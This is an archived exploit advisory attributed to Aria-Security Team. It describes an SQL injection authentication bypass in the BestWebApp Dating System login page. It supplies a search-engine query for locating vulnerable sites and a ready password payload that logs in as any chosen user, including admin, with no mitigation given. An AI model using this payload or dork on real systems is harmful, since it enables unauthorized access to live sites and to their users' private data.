AOH :: HP Unsorted B :: BX2087.HTM

BestWebApp Dating System SQL Injection



BestWebApp Dating System SQL Injection
BestWebApp Dating System SQL Injection



Aria-Security Team (Persian Security Network)
http://Aria-Security.net
-------------------------------
Shutouts: AurA, imm02tal
Original Advisory and more info about this vulnerability: http://forum.aria-security.net/showthread.php?p=1442
Vendor: http://www.bestwebapp.com
Google Search: inurl:login_form.asp DATING Website

Login_form.asp
Chose Any username you want, doesnt matter, it can be admin, or just a normal user. YOU CHOSE!
Password: anything' OR 'x'='x


Regards,
The-0utl4w
Credits Goes To Aria-Security.Net

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.